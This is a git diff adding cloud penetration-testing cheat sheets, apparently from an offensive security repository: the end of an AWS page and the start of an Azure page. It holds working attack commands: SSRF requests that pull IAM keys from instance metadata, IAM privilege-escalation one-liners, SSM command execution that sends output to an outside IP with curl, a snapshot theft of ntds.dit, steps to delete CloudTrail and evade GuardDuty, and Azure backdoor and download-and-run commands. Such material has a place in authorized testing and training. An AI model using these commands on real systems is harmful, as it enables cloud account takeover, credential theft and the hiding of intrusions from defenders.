+| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com |
+| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com |
+| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com |
+| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com |
+| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com |
+| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com |
+| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel |
+
+
+## AWS - Metadata SSRF
+
+> AWS released an additional security defences against the attack.
+
+:warning: Only working with IMDSv1.
+Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required`.
+
+In order to usr IMDSv2 you must provide a token.
+
+```powershell
+export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
+curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
+```
+
+### Method for Elastic Cloud Compute (EC2)
+
+Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
+
+1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
+    ```powershell
+    ami-id
+    ami-launch-index
+    ami-manifest-path
+    block-device-mapping/
+    events/
+    hostname
+    iam/
+    identity-credentials/
+    instance-action
+    instance-id
+    ```
+2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
+3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
+    ```powershell
+    {
+    "Code" : "Success",
+    "LastUpdated" : "2019-07-31T23:08:10Z",
+    "Type" : "AWS-HMAC",
+    "AccessKeyId" : "ASIA54BL6PJR37YOEP67",
+    "SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2",
+    "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv",
+    "Expiration" : "2019-08-01T05:20:30Z"
+    }
+    ```
+
+### Method for Container Service (Fargate)
+
+1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ
+    ```powershell
+    JAVA_ALPINE_VERSION=8.212.04-r0
+    HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root
+    AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
+    AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2
+    ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd
+    ```
+2. Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
+    ```powershell
+    {
+        "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role",
+        "AccessKeyId": "ASIA54BL6PJR2L75XHVS",
+        "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt",
+        "Token": "FQoGZXIvYXdzEMj//////////wEaDEQW+wwBtaoyqH5lNSLGBF3PnwnLYa3ggfKBtLMoWCEyYklw6YX85koqNwKMYrP6ymcjv4X2gF5enPi9/Dx6m/1TTFIwMzZ3tf4V3rWP3HDt1ea6oygzTrWLvfdp57sKj+2ccXI+WWPDZh3eJr4Wt4JkiiXrWANn7Bx3BUj9ZM11RXrKRCvhrxdrMLoewRkWmErNEOFgbaCaT8WeOkzqli4f+Q36ZerT2V+FJ4SWDX1CBsimnDAMAdTIRSLFxVBBwW8171OHiBOYAMK2np1xAW1d3UCcZcGKKZTjBee2zs5+Rf5Nfkoq+j7GQkmD2PwCeAf0RFETB5EVePNtlBWpzfOOVBtsTUTFewFfx5cyNsitD3C2N93WR59LX/rNxyncHGDUP/6UPlasOcfzAaG738OJQmWfQTR0qksHIc2qiPtkstnNndh76is+r+Jc4q3wOWu2U2UBi44Hj+OS2UTpMAwc/MshIiGsUOrBQdPqcLLdAxKpUNTdSQNLg5wv4f2OrOI8/sneV58yBRolBz8DZoH8wohtLXpueDt8jsVSVLznnMOOe/4ehHE2Nt+Fy+tjaY5FUi/Ijdd5IrIdIvWFHY1XcPopUFYrDqr0yuZvX1YddfIcfdbmxf274v69FuuywXTo7cXk1QTMYZWlD/dPI/k6KQeO446UrHT9BJxcJMpchAIVRpI7nVKkSDwku1joKUG7DOeycuAbhecVZG825TocL0ks2yXPnIdvckAaU9DZf+afIV3Nxv3TI4sSX1npBhb2f/8C31pv8VHyu2NiN5V6OOHzZijHsYXsBQ==",
+        "Expiration": "2019-09-18T04:05:59Z"
+    }
+    ```
+
+
+## AWS - Shadow Admin 
+
+### Admin equivalent permission 
+
+- AdministratorAccess
+
+    ```powershell
+    "Action": "*"
+    "Resource": "*"
+    ```
+
+- ec2:AssociateIamInstanceProfile
+
+- **iam:CreateAccessKey**iam:CreateAccessKey : create a new access key to another IAM admin account
+    ```powershell
+    aws iam create-access-key –user-name target_user
+    ```
+
+- **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it 
+    ```powershell
+    $ aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required
+    ```
+
+- **iam:UpdateLoginProfile** : reset other IAM users’ login passwords.
+    ```powershell
+    $ aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required
+    ```
+
+- **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses
+    ```powershell
+    $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
+    $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
+    $ aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess
+    ```
+
+- **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities.
+    ```powershell
+    $ aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json
+    ```
+
+- **iam:CreatePolicy** : add a stealthy admin policy
+- **iam:AddUserToGroup** : add into the admin group of the organization.
+    ```powershell
+    $ aws iam add-user-to-group –group-name target_group –user-name my_username
+    ```
+
+- **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account.
+    ```powershell
+    $ aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json
+    ```
+
+- **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one.
+    ```powershell
+    $ aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default
+    $ aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
+    ```
+
+- **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function.
+    ```powershell
+    $ aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip
+    ```
+
+- **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint.
+    ```powershell
+    $ aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub
+    ```
+
+
+- **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses.
+
+- **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account.
+    ```powershell
+    # add ssh key
+    $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456
+    # execute a reverse shell
+    $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh
+    ```
+
+- **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account.
+    ```powershell
+    $ aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py
+    $ aws lambda invoke –function-name my_function output.txt
+    ```
+    Example of code.py
+    ```python
+    import boto3
+    def lambda_handler(event, context):
+        client = boto3.client('iam')
+        response = client.attach_user_policy(
+        UserName='my_username',
+        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
+        )
+        return response
+    ```
+
+* **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account.
+    ```powershell
+    $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub
+    ```
+
+## AWS - Gaining AWS Console Access via API Keys
+
+A utility to convert your AWS CLI credentials into AWS console access.
+
+```powershell
+$> git clone https://github.com/NetSPI/aws_consoler
+$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED]
+2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments...
+2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic.
+2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established.
+2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session.
+2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established.
+2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler.
+2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated!
+https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED
+```
+
+## AWS - Mount EBS volume to EC2 Linux
+
+:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
+
+Step 1: Head over to EC2 –> Volumes and create a new volume of your preferred size and type.
+Step 2: Select the created volume, right click and select the "attach volume" option.
+Step 3: Select the instance from the instance text box as shown below : `attach ebs volume`
+  ```powershell
+  aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
+  aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device
+  ```
+
+Step 4: Now, login to your ec2 instance and list the available disks using the following command : `lsblk`
+Step 5: Check if the volume has any data using the following command : `sudo file -s /dev/xvdf`
+Step 6: Format the volume to ext4 filesystem  using the following command : `sudo mkfs -t ext4 /dev/xvdf`
+Step 7: Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume`
+Step 8: Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/`
+Step 9: cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .`
+
+
+## AWS - Copy EC2 using AMI Image
+
+First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1`
+
+```powershell
+# create a new image for the instance-id
+$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1  
+
+# add key to AWS
+$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1  
+
+# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
+$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
+
+# now you can check the instance 
+aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 
+
+# If needed : edit groups
+aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01"  --region eu-west-1
+
+# be a good guy, clean our instance to avoid any useless cost
+aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 
+aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
+```
+
+## AWS - Instance Connect - Push an SSH key to EC2 instance
+
+```powershell
+# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/
+$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"
+$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds
+```
+
+## AWS - Lambda - Extract function's code
+
+```powershell
+# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed
+$ aws lambda list-functions --profile uploadcreds
+$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
+$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
+```
+
+## AWS - SSM - Command execution
+
+:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
+
+SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
+* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
+* Windows Server 2016 and 2019
+* Amazon Linux
+* Amazon Linux 2
+* Ubuntu Server 16.04
+* Ubuntu Server 18.04
+* Amazon ECS-Optimized
+
+```powershell
+$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1  
+$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
+$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
+
+e.g:
+$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
+```
+
+## AWS - Golden SAML Attack
+
+https://www.youtube.com/watch?v=5dj4vOqqGZw    
+https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/
+
+> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements. 
+
+Requirement:
+* Token-signing private key (export from personnal store using Mimikatz)
+* IdP public certificate
+* IdP name
+* Role name (role to assume)
+
+```powershell
+$ python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
+$ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
+-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
+```
+
+## AWS - Shadow Copy attack
+
+Prerequisite:
+* EC2:CreateSnapshot
+* CloudCopy - https://github.com/Static-Flow/CloudCopy
+
+1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
+2. Run `"Describe-Instances"` and show in list for attacker to select
+3. Run `"Create-Snapshot"` on volume of selected instance
+4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
+5. Load AWS CLI with Attacker Credentials
+6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
+7. Ssh run `"sudo mkdir /windows"`
+8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
+9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
+10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
+11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
+12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
+13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
+14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
+
+
+## Disable CloudTrail
+
+```powershell
+$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
+```
+
+Disable monitoring of events from global services 
+
+```powershell
+$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event 
+```
+
+Disable Cloud Trail on specific regions
+
+```powershell
+$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
+```
+
+
+## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
+
+:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.
+
+Pacu bypass this problem by defining a custom User-agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473)
+
+```python
+boto3_session = boto3.session.Session()
+ua = boto3_session._session.user_agent()
+if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower():  # If the local OS is Kali/Parrot/Pentoo Linux
+    # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that...
+    self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
+```
+
+### PenTest:IAMUser/KaliLinux
+
+#### Finding description
+
+**An API was invoked from a Kali Linux EC2 instance\.**
+
+This finding informs you that a machine running Kali Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Kali Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
+
+#### Default severity: Medium
+
+### PenTest:IAMUser/ParrotLinux
+
+#### Finding description
+
+**An API was invoked from a Parrot Security Linux EC2 instance\.**
+
+This finding informs you that a machine running Parrot Security Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Parrot Security Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
+
+#### Default severity: Medium
+
+### PenTest:IAMUser/PentooLinux
+
+#### Finding description
+
+**An API was invoked from a Pentoo Linux EC2 instance\.**
+
+This finding informs you that a machine running Pentoo Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Pentoo Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\.
+
+#### Default severity: Medium<a name="pentest3_severity"></a>
+
+
+## Security checks
+
+https://github.com/DenizParlak/Zeus
+
+* Identity and Access Management
+  * Avoid the use of the "root" account
+  * Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password
+  * Ensure credentials unused for 90 days or greater are disabled
+  * Ensure access keys are rotated every 90 days or less
+  * Ensure IAM password policy requires at least one uppercase letter
+  * Ensure IAM password policy requires at least one lowercase letter
+  * Ensure IAM password policy requires at least one symbol
+  * Ensure IAM password policy requires at least one number
+  * Ensure IAM password policy requires minimum length of 14 or greater
+  * Ensure no root account access key exists
+  * Ensure MFA is enabled for the "root" account
+  * Ensure security questions are registered in the AWS account
+  * Ensure IAM policies are attached only to groups or role
+  * Enable detailed billing
+  * Maintain current contact details
+  * Ensure security contact information is registered
+  * Ensure IAM instance roles are used for AWS resource access from instances
+* Logging
+  * Ensure CloudTrail is enabled in all regions
+  * Ensure CloudTrail log file validation is enabled
+  * Ensure the S3 bucket CloudTrail logs to is not publicly accessible
+  * Ensure CloudTrail trails are integrated with CloudWatch Logs
+  * Ensure AWS Config is enabled in all regions
+  * Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket
+  * Ensure CloudTrail logs are encrypted at rest using KMS CMKs
+  * Ensure rotation for customer created CMKs is enabled
+* Networking
+  * Ensure no security groups allow ingress from 0.0.0.0/0 to port 22
+  * Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389
+  * Ensure VPC flow logging is enabled in all VPC
+  * Ensure the default security group of every VPC restricts all traffic
+* Monitoring
+  * Ensure a log metric filter and alarm exist for unauthorized API calls
+  * Ensure a log metric filter and alarm exist for Management Consolesign-in without MFA
+  * Ensure a log metric filter and alarm exist for usage of "root" account
+  * Ensure a log metric filter and alarm exist for IAM policy changes
+  * Ensure a log metric filter and alarm exist for CloudTrail configuration changes
+  * Ensure a log metric filter and alarm exist for AWS Management Console authentication failures
+  * Ensure a log metric filter and alarm exist for disabling or scheduled deletion of customer created CMKs
+  * Ensure a log metric filter and alarm exist for S3 bucket policy changes
+  * Ensure a log metric filter and alarm exist for AWS Config configuration changes
+  * Ensure a log metric filter and alarm exist for security group changes
+  * Ensure a log metric filter and alarm exist for changes to NetworkAccess Control Lists (NACL)
+  * Ensure a log metric filter and alarm exist for changes to network gateways
+  * Ensure a log metric filter and alarm exist for route table changes
+  * Ensure a log metric filter and alarm exist for VPC changes
+
+
+## References
+
+* [An introduction to penetration testing AWS - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-aws/)
+* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/)
+* [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
+* [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+* [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b)
+* [Pacu Open source AWS Exploitation framework - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/)
+* [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5)
+* [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/)
+* [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6)
+* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35)
+* [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md)
+* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/)
+* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
+* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
+* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
+* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/)
\ No newline at end of file
diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
new file mode 100644
index 00000000..9c4d6923
--- /dev/null
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -0,0 +1,446 @@
+# Azure
+
+## Summary
+
+* [Tools](#tools)
+* [Azure Architecture](#azure-architecture)
+* [Azure Storage Account - Access](#azure-storage-account----access)
+* [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
+* [Azure AD - Enumeration](#azure-ad---enumeration)
+* [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
+* [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
+* [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
+* [Azure AD Connect - Seamless Single Sign On Silver Ticket](#azure-ad-connect---seamless-single-sign-on-silver-ticket)
+* [Azure AD - ADFS Federation Server ~Cloud Kerberos](#azure-ad---adfs-federation-server-cloud-kerberos)
+* [Azure AD - Persistence via Automation accounts](#azure-ad---persistence-via-automation-accounts)
+* [Azure VM - Execute command as NT SYSTEM with Contributor right](#azure-vm---execute-command-as-nt-system-with-contributor-right)
+* [Office365 - Enumerating Users](#office365---enumerating-users)
+* [References](#references)
+
+## Tools
+
+:warning: 16 apr 2019 : BloodHound does not support any analysis with AzureAD.    
+:warning: Tokens for Azure are cached in `C:\Users\[Name]\.Azure\accessTokens.json`
+
+* **PowerZure** - 
+    ```powershell
+    require az module !
+    $ git clone https://github.com/hausec/PowerZure
+    $ ipmo .\PowerZure
+    $ Set-Subscription -Id [idgoeshere]
+    # Reader
+    $ Get-Runbook
+
+    # Contributor
+    $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
+    $ Execute-MSBuild -VM Win10Test  -ResourceGroup Test-RG -File "build.xml"
+    $ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents
+    $ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk
+
+    # Owner
+    $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
+    
+    # Administrator
+    $ Create-Backdoor, Execute-Backdoor
+    ```
+
+* **Azure CLI** - Default azure CLI
+    ```powershell
+    $ AZ_REPO=$(lsb_release -cs) echo "deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ $AZ_REPO main" | sudo tee /etc/apt/sources.list.d/azure-cli.list
+    $ curl -L https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
+    $ sudo apt-get install apt-transport-https
+    $ sudo apt-get update && sudo apt-get install azure-cli
+    # dump users
+    $ az ad user list --output=table --query='[].{Created:createdDateTime,UPN:userPrincipalName,Name:displayName,Title:jobTitle,Department:department,Email:mail,UserId:mailNickname,Phone:telephoneNumber,Mobile:mobile,Enabled:accountEnabled}'
+    ```
+
+* **MicroBurst** - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
+    ```powershell
+    $ git clone https://github.com/NetSPI/MicroBurst
+    PS C:> Import-Module .\MicroBurst.psm1
+    PS C:> Import-Module .\Get-AzureDomainInfo.ps1
+    PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
+    ```
+
+* **SkyArk** - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.   
+    Require:
+    - Read-Only permissions over Azure Directory (Tenant)
+    - Read-Only permissions over Subscription
+    - Require AZ and AzureAD module or administrator right
+
+    ```powershell
+    $ git clone https://github.com/cyberark/SkyArk
+    $ powershell -ExecutionPolicy Bypass -NoProfile
+    PS C> Import-Module .\SkyArk.ps1 -force
+    PS C> Start-AzureStealth
+
+    or in the Cloud Console
+
+    PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')  
+    PS C> Scan-AzureAdmins  
+    ```
+
+* **Azurite Explorer** and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
+
+    ```powershell
+    git clone https://github.com/mwrlabs/Azurite.git
+    git clone https://github.com/FSecureLABS/Azurite
+    git submodule init
+    git submodule update
+    PS> Import-Module AzureRM
+    PS> Import-Module AzuriteExplorer.ps1
+    PS> Review-AzureRmSubscription
+    PS> Review-CustomAzureRmSubscription
+    ```
+
